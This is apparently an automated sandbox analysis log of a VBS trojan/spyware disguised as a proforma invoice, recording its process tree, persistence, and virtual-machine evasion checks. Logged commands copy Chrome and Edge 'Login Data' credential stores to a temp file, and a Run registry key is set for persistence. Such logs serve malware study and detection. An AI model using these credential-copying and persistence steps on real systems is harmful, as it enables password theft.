Source: C:\Windows\explorer.exe Process created: C:\Program Files (x86)\Internet Explorer\ielowutil.exe "C:\Program Files (x86)\internet explorer\ielowutil.exe"
Source: C:\Windows\explorer.exe Process created: C:\Program Files (x86)\Internet Explorer\ielowutil.exe "C:\Program Files (x86)\internet explorer\ielowutil.exe"
Source: C:\Windows\SysWOW64\rundll32.exe Process created: C:\Windows\SysWOW64\cmd.exe /c copy "C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Login Data" "C:\Users\user\AppData\Local\Temp\DB1" /V
Source: C:\Windows\SysWOW64\cmd.exe Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Windows\SysWOW64\rundll32.exe Process created: C:\Windows\SysWOW64\cmd.exe /c copy "C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Login Data" "C:\Users\user\AppData\Local\Temp\DB1" /V
Source: C:\Windows\SysWOW64\cmd.exe Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Windows\SysWOW64\rundll32.exe Process created: C:\Program Files\Mozilla Firefox\firefox.exe C:\Program Files\Mozilla Firefox\Firefox.exe
Source: C:\Windows\System32\wscript.exe Process created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe" -EncodedCommand
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe" /noconfig /fullpaths @"C:\Users\user\AppData\Local\Temp\tmhd51lu\tmhd51lu.cmdline
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process created: C:\Program Files (x86)\Internet Explorer\ieinstal.exe C:\Program Files (x86)\internet explorer\ieinstal.exe
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process created: C:\Program Files (x86)\Internet Explorer\ieinstal.exe C:\Program Files (x86)\internet explorer\ieinstal.exe
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process created: C:\Program Files (x86)\Internet Explorer\ieinstal.exe C:\Program Files (x86)\internet explorer\ieinstal.exe
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process created: C:\Program Files (x86)\Internet Explorer\ieinstal.exe C:\Program Files (x86)\internet explorer\ieinstal.exe
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process created: C:\Program Files (x86)\Internet Explorer\ieinstal.exe C:\Program Files (x86)\internet explorer\ieinstal.exe
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process created: C:\Program Files (x86)\Internet Explorer\ieinstal.exe C:\Program Files (x86)\internet explorer\ieinstal.exe
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process created: C:\Program Files (x86)\Internet Explorer\ieinstal.exe C:\Program Files (x86)\internet explorer\ieinstal.exe
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process created: C:\Program Files (x86)\Internet Explorer\ieinstal.exe C:\Program Files (x86)\internet explorer\ieinstal.exe
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process created: C:\Program Files (x86)\Internet Explorer\ieinstal.exe C:\Program Files (x86)\internet explorer\ieinstal.exe
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process created: C:\Program Files (x86)\Internet Explorer\ieinstal.exe C:\Program Files (x86)\internet explorer\ieinstal.exe
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process created: C:\Program Files (x86)\Internet Explorer\ieinstal.exe C:\Program Files (x86)\internet explorer\ieinstal.exe
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process created: C:\Program Files (x86)\Internet Explorer\ielowutil.exe C:\Program Files (x86)\internet explorer\ielowutil.exe
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe Process created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\cvtres.exe C:\Windows\Microsoft.NET\Framework\v4.0.30319\cvtres.exe /NOLOGO /READONLY /MACHINE:IX86 "/OUT:C:\Users\user\AppData\Local\Temp\RESBA75.tmp" "c:\Users\user\AppData\Local\Temp\tmhd51lu\CSCDE243CA280D4B5C9E282790C554DB9.TMP"
Source: C:\Program Files (x86)\Internet Explorer\ielowutil.exe Process created: C:\Windows\SysWOW64\rundll32.exe C:\Windows\SysWOW64\rundll32.exe
Source: C:\Windows\explorer.exe Process created: C:\Program Files (x86)\Internet Explorer\ielowutil.exe "C:\Program Files (x86)\internet explorer\ielowutil.exe"
Source: C:\Windows\explorer.exe Process created: C:\Program Files (x86)\Internet Explorer\ielowutil.exe "C:\Program Files (x86)\internet explorer\ielowutil.exe"
Source: C:\Windows\SysWOW64\rundll32.exe Process created: C:\Windows\SysWOW64\cmd.exe /c copy "C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Login Data" "C:\Users\user\AppData\Local\Temp\DB1" /V
Source: C:\Windows\SysWOW64\rundll32.exe Process created: C:\Windows\SysWOW64\cmd.exe /c copy "C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Login Data" "C:\Users\user\AppData\Local\Temp\DB1" /V
Source: C:\Windows\SysWOW64\rundll32.exe Process created: C:\Program Files\Mozilla Firefox\firefox.exe C:\Program Files\Mozilla Firefox\Firefox.exe
Source: C:\Windows\System32\wscript.exe Key value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{B54F3741-5B07-11cf-A4B0-00AA004A55E8}\InprocServer32
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe File created: C:\Users\user\Documents\20220808
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe File created: C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_p4elcppe.v1c.ps1
Source: classification engine Classification label: mal100.troj.spyw.evad.winVBS@46/10@32/22
Source: C:\Windows\System32\wscript.exe File read: C:\Users\user\Desktop\desktop.ini
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Section loaded: C:\Windows\assembly\NativeImages_v4.0.30319_32\mscorlib\e4a1c9189d2b01f018b953e46c80d120\mscorlib.ni.dll
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe Section loaded: C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorlib.dll
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe Section loaded: C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorlib.dll
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe Section loaded: C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorlib.dll
Source: C:\Program Files (x86)\Internet Explorer\ielowutil.exe Process created: C:\Windows\SysWOW64\rundll32.exe C:\Windows\SysWOW64\rundll32.exe
Source: C:\Windows\System32\conhost.exe Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:4056:304:WilStaging_02
Source: C:\Windows\System32\conhost.exe Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:4056:120:WilError_03
Source: C:\Windows\System32\conhost.exe Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:5456:304:WilStaging_02
Source: C:\Windows\System32\conhost.exe Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:5456:120:WilError_03
Source: C:\Windows\System32\conhost.exe Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:840:304:WilStaging_02
Source: C:\Windows\System32\conhost.exe Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:840:120:WilError_03
Source: unknown Process created: C:\Windows\System32\wscript.exe C:\Windows\System32\wscript.exe "C:\Users\user\Desktop\Unclear Proforma Invoice.vbs"
Source: Window Recorder Window detected: More than 3 window changes detected
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe File opened: C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorrc.dll
Source: C:\Windows\SysWOW64\rundll32.exe Key opened: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Office\15.0\Outlook\Profiles\Outlook\
Source: Binary string: l8C:\Users\user\AppData\Local\Temp\tmhd51lu\tmhd51lu.pdb source: powershell.exe, 00000004.00000002.3064710007.00000000054BC000.00000004.00000800.00020000.00000000.sdmp
Source: Binary string: ielowutil.pdbGCTL source: rundll32.exe, 00000017.00000002.6901001103.00000000057A7000.00000004.10000000.00040000.00000000.sdmp, rundll32.exe, 00000017.00000002.6871882475.0000000003600000.00000004.00000020.00020000.00000000.sdmp, firefox.exe, 0000001E.00000002.4148473571.000000002F1D7000.00000004.80000000.00040000.00000000.sdmp
Source: Binary string: l8C:\Users\user\AppData\Local\Temp\tmhd51lu\tmhd51lu.pdb| source: powershell.exe, 00000004.00000002.3056176789.0000000005352000.00000004.00000800.00020000.00000000.sdmp
Source: Binary string: wntdll.pdbUGP source: ielowutil.exe, 00000015.00000003.2869442608.000000001EB08000.00000004.00000800.00020000.00000000.sdmp, ielowutil.exe, 00000015.00000003.2879705616.000000001ECB7000.00000004.00000800.00020000.00000000.sdmp, ielowutil.exe, 00000015.00000002.3513266224.000000001EE60000.00000040.00000800.00020000.00000000.sdmp, ielowutil.exe, 00000015.00000002.3519720123.000000001EF8D000.00000040.00000800.00020000.00000000.sdmp, rundll32.exe, 00000017.00000002.6898086927.000000000537D000.00000040.00000800.00020000.00000000.sdmp, rundll32.exe, 00000017.00000003.3485670121.0000000004EE8000.00000004.00000800.00020000.00000000.sdmp, rundll32.exe, 00000017.00000003.3494974915.000000000509C000.00000004.00000800.00020000.00000000.sdmp, rundll32.exe, 00000017.00000002.6887898372.0000000005250000.00000040.00000800.00020000.00000000.sdmp
Source: Binary string: wntdll.pdb source: ielowutil.exe, ielowutil.exe, 00000015.00000003.2869442608.000000001EB08000.00000004.00000800.00020000.00000000.sdmp, ielowutil.exe, 00000015.00000003.2879705616.000000001ECB7000.00000004.00000800.00020000.00000000.sdmp, ielowutil.exe, 00000015.00000002.3513266224.000000001EE60000.00000040.00000800.00020000.00000000.sdmp, ielowutil.exe, 00000015.00000002.3519720123.000000001EF8D000.00000040.00000800.00020000.00000000.sdmp, rundll32.exe, 00000017.00000002.6898086927.000000000537D000.00000040.00000800.00020000.00000000.sdmp, rundll32.exe, 00000017.00000003.3485670121.0000000004EE8000.00000004.00000800.00020000.00000000.sdmp, rundll32.exe, 00000017.00000003.3494974915.000000000509C000.00000004.00000800.00020000.00000000.sdmp, rundll32.exe, 00000017.00000002.6887898372.0000000005250000.00000040.00000800.00020000.00000000.sdmp
Source: Binary string: rundll32.pdb source: ielowutil.exe, 00000015.00000003.3479628208.000000000336A000.00000004.00000020.00020000.00000000.sdmp, ielowutil.exe, 00000015.00000002.3487380043.00000000030D0000.00000040.10000000.00040000.00000000.sdmp
Source: Binary string: rundll32.pdbGCTL source: ielowutil.exe, 00000015.00000003.3479628208.000000000336A000.00000004.00000020.00020000.00000000.sdmp, ielowutil.exe, 00000015.00000002.3487380043.00000000030D0000.00000040.10000000.00040000.00000000.sdmp
Source: Binary string: ielowutil.pdb source: rundll32.exe, 00000017.00000002.6901001103.00000000057A7000.00000004.10000000.00040000.00000000.sdmp, rundll32.exe, 00000017.00000002.6871882475.0000000003600000.00000004.00000020.00020000.00000000.sdmp, firefox.exe, 0000001E.00000002.4148473571.000000002F1D7000.00000004.80000000.00040000.00000000.sdmp
Source: Binary string: firefox.pdb source: rundll32.exe, 00000017.00000003.4143320533.0000000007CC6000.00000004.00000800.00020000.00000000.sdmp, rundll32.exe, 00000017.00000003.4079152857.0000000007642000.00000004.00000800.00020000.00000000.sdmp

Data Obfuscation

Source: Yara match File source: 00000015.00000000.2784654077.0000000002EB0000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
Source: C:\Program Files (x86)\Internet Explorer\ielowutil.exe Code function: 21_2_1EE908CD push ecx; mov dword ptr [esp], ecx 21_2_1EE908D6
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe" /noconfig /fullpaths @"C:\Users\user\AppData\Local\Temp\tmhd51lu\tmhd51lu.cmdline
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe" /noconfig /fullpaths @"C:\Users\user\AppData\Local\Temp\tmhd51lu\tmhd51lu.cmdline Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe File created: C:\Users\user\AppData\Local\Temp\tmhd51lu\tmhd51lu.dll Jump to dropped file
Source: C:\Windows\SysWOW64\rundll32.exe Registry value created or modified: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Run TRF82PDXCN Jump to behavior
Source: C:\Windows\SysWOW64\rundll32.exe Registry value created or modified: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Run TRF82PDXCN Jump to behavior
Source: C:\Windows\System32\wscript.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\wscript.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Program Files (x86)\Internet Explorer\ielowutil.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\explorer.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\rundll32.exe Process information set: NOGPFAULTERRORBOX | NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\cmd.exe Process information set: NOGPFAULTERRORBOX | NOOPENFILEERRORBOX
Source: C:\Windows\System32\conhost.exe Process information set: NOGPFAULTERRORBOX | NOOPENFILEERRORBOX

Malware Analysis System Evasion

Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe File opened: C:\Program Files\Qemu-ga\qemu-ga.exe
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe File opened: C:\Program Files\qga\qga.exe
Source: C:\Program Files (x86)\Internet Explorer\ielowutil.exe File opened: C:\Program Files\Qemu-ga\qemu-ga.exe
Source: C:\Program Files (x86)\Internet Explorer\ielowutil.exe File opened: C:\Program Files\qga\qga.exe
Source: powershell.exe, 00000004.00000002.3158860748.0000000009060000.00000004.00000800.00020000.00000000.sdmp Binary or memory string: C:\PROGRAM FILES\QEMU-GA\QEMU-GA.EXE
Source: C:\Windows\explorer.exe TID: 1544 Thread sleep time: -160000s >= -30000s
Source: C:\Windows\explorer.exe Last function: Thread delayed
Source: C:\Windows\SysWOW64\rundll32.exe Last function: Thread delayed
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe Dropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\tmhd51lu\tmhd51lu.dll
Source: C:\Program Files (x86)\Internet Explorer\ielowutil.exe Code function: 21_2_1EF0CE40 rdtsc 21_2_1EF0CE40
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Window / User API: threadDelayed 9194
Source: C:\Program Files (x86)\Internet Explorer\ielowutil.exe API coverage: 1.1 %
Source: C:\Windows\System32\wscript.exe Window found: window name: WSH-Timer
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information queried: ProcessInformation
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Code function: 4_2_07ED5E70 GetSystemInfo, 4_2_07ED5E70
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe System information queried: ModuleInformation
Source: powershell.exe, 00000004.00000002.3173947431.000000000B609000.00000004.00000800.00020000.00000000.sdmp, ielowutil.exe, 00000015.00000002.3491341572.0000000004DD9000.00000004.00000800.00020000.00000000.sdmp Binary or memory string: Hyper-V Guest Shutdown Service
Source: powershell.exe, 00000004.00000002.3173947431.000000000B609000.00000004.00000800.00020000.00000000.sdmp, ielowutil.exe, 00000015.00000002.3491341572.0000000004DD9000.00000004.00000800.00020000.00000000.sdmp Binary or memory string: Hyper-V Remote Desktop Virtualization Service
Source: ielowutil.exe, 00000015.00000002.3491341572.0000000004DD9000.00000004.00000800.00020000.00000000.sdmp Binary or memory string: vmicshutdown
Source: powershell.exe, 00000004.00000002.3173947431.000000000B609000.00000004.00000800.00020000.00000000.sdmp, ielowutil.exe, 00000015.00000002.3491341572.0000000004DD9000.00000004.00000800.00020000.00000000.sdmp Binary or memory string: Hyper-V Volume Shadow Copy Requestor
Source: explorer.exe, 00000016.00000000.2962923162.000000000D6C9000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000016.00000000.3217241697.000000000D6C9000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000016.00000000.3363785721.000000000D6C9000.00000004.00000001.00020000.00000000.sdmp Binary or memory string: Hyper-V RAWP
Source: powershell.exe, 00000004.00000002.3173947431.000000000B609000.00000004.00000800.00020000.00000000.sdmp, ielowutil.exe, 00000015.00000002.3491341572.0000000004DD9000.00000004.00000800.00020000.00000000.sdmp Binary or memory string: Hyper-V PowerShell Direct Service
Source: powershell.exe, 00000004.00000002.3173947431.000000000B609000.00000004.00000800.00020000.00000000.sdmp, ielowutil.exe, 00000015.00000002.3491341572.0000000004DD9000.00000004.00000800.00020000.00000000.sdmp Binary or memory string: Hyper-V Time Synchronization Service
Source: ielowutil.exe, 00000015.00000002.3491341572.0000000004DD9000.00000004.00000800.00020000.00000000.sdmp Binary or memory string: vmicvss
Source: ielowutil.exe, 00000015.00000003.3480804459.000000000332F000.00000004.00000020.00020000.00000000.sdmp, ielowutil.exe, 00000015.00000003.2876616616.0000000003365000.00000004.00000020.00020000.00000000.sdmp, ielowutil.exe, 00000015.00000002.3489499087.0000000003330000.00000004.00000020.00020000.00000000.sdmp, ielowutil.exe, 00000015.00000003.3482060149.0000000003365000.00000004.00000020.00020000.00000000.sdmp, ielowutil.exe, 00000015.00000002.3490596692.0000000003365000.00000004.00000020.00020000.00000000.sdmp, explorer.exe, 00000016.00000000.3380165644.0000000010D9C000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000016.00000000.3126162706.0000000010D9C000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000016.00000000.2988307182.0000000010D9C000.00000004.00000001.00020000.00000000.sdmp Binary or memory string: Hyper-V RAW
Source: ielowutil.exe, 00000015.00000003.3481308758.0000000003348000.00000004.00000020.00020000.00000000.sdmp, ielowutil.exe, 00000015.00000002.3489945907.0000000003348000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: Hyper-V RAW:%
Source: powershell.exe, 00000004.00000002.3158860748.0000000009060000.00000004.00000800.00020000.00000000.sdmp Binary or memory string: C:\Program Files\Qemu-ga\qemu-ga.exe
Source: powershell.exe, 00000004.00000002.3173947431.000000000B609000.00000004.00000800.00020000.00000000.sdmp, ielowutil.exe, 00000015.00000002.3491341572.0000000004DD9000.00000004.00000800.00020000.00000000.sdmp Binary or memory string: Hyper-V Data Exchange Service
Source: powershell.exe, 00000004.00000002.3173947431.000000000B609000.00000004.00000800.00020000.00000000.sdmp, ielowutil.exe, 00000015.00000002.3491341572.0000000004DD9000.00000004.00000800.00020000.00000000.sdmp Binary or memory string: Hyper-V Heartbeat Service
Source: powershell.exe, 00000004.00000002.3173947431.000000000B609000.00000004.00000800.00020000.00000000.sdmp, ielowutil.exe, 00000015.00000002.3491341572.0000000004DD9000.00000004.00000800.00020000.00000000.sdmp Binary or memory string: Hyper-V Guest Service Interface
Source: ielowutil.exe, 00000015.00000002.3491341572.0000000004DD9000.00000004.00000800.00020000.00000000.sdmp Binary or memory string: vmicheartbeat
Source: firefox.exe, 0000001E.00000002.4154993499.00000231AF32F000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: Hyper-V RAW%SystemRoot%\system32\mswsock.dll11
Source: C:\Program Files (x86)\Internet Explorer\ielowutil.exe Code function: 21_2_1EF0CE40 rdtsc 21_2_1EF0CE40
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process token adjusted: Debug
Source: C:\Program Files (x86)\Internet Explorer\ielowutil.exe Process token adjusted: Debug
Source: C:\Program Files (x86)\Internet Explorer\ielowutil.exe Code function: 21_2_1EEC1EED mov eax, dword ptr fs:[00000030h] 21_2_1EEC1EED
Source: C:\Program Files (x86)\Internet Explorer\ielowutil.exe Code function: 21_2_1EE92EE8 mov eax, dword ptr fs:[00000030h] 21_2_1EE92EE8
Source: C:\Program Files (x86)\Internet Explorer\ielowutil.exe Code function: 21_2_1EE93EE2 mov eax, dword ptr fs:[00000030h] 21_2_1EE93EE2
Source: C:\Program Files (x86)\Internet Explorer\ielowutil.exe Code function: 21_2_1EF33EFC mov eax, dword ptr fs:[00000030h] 21_2_1EF33EFC
Source: C:\Program Files (x86)\Internet Explorer\ielowutil.exe Code function: 21_2_1EF4EEE7 mov eax, dword ptr fs:[00000030h] 21_2_1EF4EEE7
Source: C:\Program Files (x86)\Internet Explorer\ielowutil.exe Code function: 21_2_1EE8CEF0 mov eax, dword ptr fs:[00000030h] 21_2_1EE8CEF0
Source: C:\Program Files (x86)\Internet Explorer\ielowutil.exe Code function: 21_2_1EF59ED2 mov eax, dword ptr fs:[00000030h] 21_2_1EF59ED2
Source: C:\Program Files (x86)\Internet Explorer\ielowutil.exe Code function: 21_2_1EF17EC3 mov eax, dword ptr fs:[00000030h] 21_2_1EF17EC3
Source: C:\Program Files (x86)\Internet Explorer\ielowutil.exe Code function: 21_2_1EF17EC3 mov ecx, dword ptr fs:[00000030h] 21_2_1EF17EC3
Source: C:\Program Files (x86)\Internet Explorer\ielowutil.exe Code function: 21_2_1EED1ED8 mov eax, dword ptr fs:[00000030h] 21_2_1EED1ED8
Source: C:\Program Files (x86)\Internet Explorer\ielowutil.exe Code function: 21_2_1EF64EC1 mov eax, dword ptr fs:[00000030h] 21_2_1EF64EC1
Source: C:\Program Files (x86)\Internet Explorer\ielowutil.exe Code function: 21_2_1EECBED0 mov eax, dword ptr fs:[00000030h] 21_2_1EECBED0
Source: C:\Program Files (x86)\Internet Explorer\ielowutil.exe Code function: 21_2_1EECCEA0 mov eax, dword ptr fs:[00000030h] 21_2_1EECCEA0
Source: C:\Program Files (x86)\Internet Explorer\ielowutil.exe Code function: 21_2_1EEC2EB8 mov eax, dword ptr fs:[00000030h] 21_2_1EEC2EB8
Source: C:\Program Files (x86)\Internet Explorer\ielowutil.exe Code function: 21_2_1EEA1EB2 mov ecx, dword ptr fs:[00000030h] 21_2_1EEA1EB2
Source: C:\Program Files (x86)\Internet Explorer\ielowutil.exe Code function: 21_2_1EEA1EB2 mov eax, dword ptr fs:[00000030h] 21_2_1EEA1EB2
Source: C:\Program Files (x86)\Internet Explorer\ielowutil.exe Code function: 21_2_1EF50EAD mov eax, dword ptr fs:[00000030h] 21_2_1EF50EAD
Source: C:\Program Files (x86)\Internet Explorer\ielowutil.exe Code function: 21_2_1EEBAE89 mov eax, dword ptr fs:[00000030h] 21_2_1EEBAE89
Source: C:\Program Files (x86)\Internet Explorer\ielowutil.exe Code function: 21_2_1EEBBE80 mov eax, dword ptr fs:[00000030h] 21_2_1EEBBE80
Source: C:\Program Files (x86)\Internet Explorer\ielowutil.exe Code function: 21_2_1EE8BE60 mov eax, dword ptr fs:[00000030h] 21_2_1EE8BE60
Source: C:\Program Files (x86)\Internet Explorer\ielowutil.exe Code function: 21_2_1EF4EE78 mov eax, dword ptr fs:[00000030h] 21_2_1EF4EE78
Source: C:\Program Files (x86)\Internet Explorer\ielowutil.exe Code function: 21_2_1EF64E62 mov eax, dword ptr fs:[00000030h] 21_2_1EF64E62
Source: C:\Program Files (x86)\Internet Explorer\ielowutil.exe Code function: 21_2_1EF40E6D mov eax, dword ptr fs:[00000030h] 21_2_1EF40E6D
Source: C:\Program Files (x86)\Internet Explorer\ielowutil.exe Code function: 21_2_1EE91E70 mov eax, dword ptr fs:[00000030h] 21_2_1EE91E70
Source: C:\Program Files (x86)\Internet Explorer\ielowutil.exe Code function: 21_2_1EECCE70 mov eax, dword ptr fs:[00000030h] 21_2_1EECCE70
Source: C:\Program Files (x86)\Internet Explorer\ielowutil.exe Code function: 21_2_1EEC7E71 mov eax, dword ptr fs:[00000030h] 21_2_1EEC7E71
Source: C:\Program Files (x86)\Internet Explorer\ielowutil.exe Code function: 21_2_1EF0DE50 mov eax, dword ptr fs:[00000030h] 21_2_1EF0DE50
Source: C:\Program Files (x86)\Internet Explorer\ielowutil.exe Code function: 21_2_1EF0DE50 mov ecx, dword ptr fs:[00000030h] 21_2_1EF0DE50
Source: C:\Program Files (x86)\Internet Explorer\ielowutil.exe Code function: 21_2_1EEBEE48 mov eax, dword ptr fs:[00000030h] 21_2_1EEBEE48
Source: C:\Program Files (x86)\Internet Explorer\ielowutil.exe Code function: 21_2_1EE8FE40 mov eax, dword ptr fs:[00000030h] 21_2_1EE8FE40
Source: C:\Program Files (x86)\Internet Explorer\ielowutil.exe Code function: 21_2_1EE8AE40 mov eax, dword ptr fs:[00000030h] 21_2_1EE8AE40
Source: C:\Program Files (x86)\Internet Explorer\ielowutil.exe Code function: 21_2_1EE8DE45 mov eax, dword ptr fs:[00000030h] 21_2_1EE8DE45
Source: C:\Program Files (x86)\Internet Explorer\ielowutil.exe Code function: 21_2_1EE8DE45 mov ecx, dword ptr fs:[00000030h] 21_2_1EE8DE45
Source: C:\Program Files (x86)\Internet Explorer\ielowutil.exe Code function: 21_2_1EF26E30 mov eax, dword ptr fs:[00000030h] 21_2_1EF26E30
Source: C:\Program Files (x86)\Internet Explorer\ielowutil.exe Code function: 21_2_1EF26E30 mov eax, dword ptr fs:[00000030h] 21_2_1EF26E30
Source: C:\Program Files (x86)\Internet Explorer\ielowutil.exe Code function: 21_2_1EF25E30 mov eax, dword ptr fs:[00000030h] 21_2_1EF25E30
Source: C:\Program Files (x86)\Internet Explorer\ielowutil.exe Code function: 21_2_1EF25E30 mov ecx, dword ptr fs:[00000030h] 21_2_1EF25E30
Source: C:\Program Files (x86)\Internet Explorer\ielowutil.exe Code function: 21_2_1EF25E30 mov eax, dword ptr fs:[00000030h] 21_2_1EF25E30
Source: C:\Program Files (x86)\Internet Explorer\ielowutil.exe Code function: 21_2_1EF25E30 mov eax, dword ptr fs:[00000030h] 21_2_1EF25E30
Source: C:\Program Files (x86)\Internet Explorer\ielowutil.exe Code function: 21_2_1EF25E30 mov eax, dword ptr fs:[00000030h] 21_2_1EF25E30
Source: C:\Program Files (x86)\Internet Explorer\ielowutil.exe Code function: 21_2_1EF25E30 mov eax, dword ptr fs:[00000030h] 21_2_1EF25E30
Source: C:\Program Files (x86)\Internet Explorer\ielowutil.exe Code function: 21_2_1EF58E26 mov eax, dword ptr fs:[00000030h] 21_2_1EF58E26
Source: C:\Program Files (x86)\Internet Explorer\ielowutil.exe Code function: 21_2_1EF58E26 mov eax, dword ptr fs:[00000030h] 21_2_1EF58E26
Source: C:\Program Files (x86)\Internet Explorer\ielowutil.exe Code function: 21_2_1EF58E26 mov eax, dword ptr fs:[00000030h] 21_2_1EF58E26
Source: C:\Program Files (x86)\Internet Explorer\ielowutil.exe Code function: 21_2_1EF58E26 mov eax, dword ptr fs:[00000030h] 21_2_1EF58E26
Source: C:\Program Files (x86)\Internet Explorer\ielowutil.exe Code function: 21_2_1EECCE3F mov eax, dword ptr fs:[00000030h] 21_2_1EECCE3F
Source: C:\Program Files (x86)\Internet Explorer\ielowutil.exe Code function: 21_2_1EE92E32 mov eax, dword ptr fs:[00000030h] 21_2_1EE92E32
Source: C:\Program Files (x86)\Internet Explorer\ielowutil.exe Code function: 21_2_1EE93E01 mov eax, dword ptr fs:[00000030h] 21_2_1EE93E01
Source: C:\Program Files (x86)\Internet Explorer\ielowutil.exe Code function: 21_2_1EE96E00 mov eax, dword ptr fs:[00000030h] 21_2_1EE96E00
Source: C:\Program Files (x86)\Internet Explorer\ielowutil.exe Code function: 21_2_1EE96E00 mov eax, dword ptr fs:[00000030h] 21_2_1EE96E00
Source: C:\Program Files (x86)\Internet Explorer\ielowutil.exe Code function: 21_2_1EE96E00 mov eax, dword ptr fs:[00000030h] 21_2_1EE96E00
Source: C:\Program Files (x86)\Internet Explorer\ielowutil.exe Code function: 21_2_1EE96E00 mov eax, dword ptr fs:[00000030h] 21_2_1EE96E00
Source: C:\Program Files (x86)\Internet Explorer\ielowutil.exe Code function: 21_2_1EF0FE1F mov eax, dword ptr fs:[00000030h] 21_2_1EF0FE1F
Source: C:\Program Files (x86)\Internet Explorer\ielowutil.exe Code function: 21_2_1EF0FE1F mov eax, dword ptr fs:[00000030h] 21_2_1EF0FE1F
Source: C:\Program Files (x86)\Internet Explorer\ielowutil.exe Code function: 21_2_1EF0FE1F mov eax, dword ptr fs:[00000030h] 21_2_1EF0FE1F
Source: C:\Program Files (x86)\Internet Explorer\ielowutil.exe Code function: 21_2_1EF0FE1F mov eax, dword ptr fs:[00000030h] 21_2_1EF0FE1F
Source: C:\Program Files (x86)\Internet Explorer\ielowutil.exe Code function: 21_2_1EE8BE18 mov ecx, dword ptr fs:[00000030h] 21_2_1EE8BE18
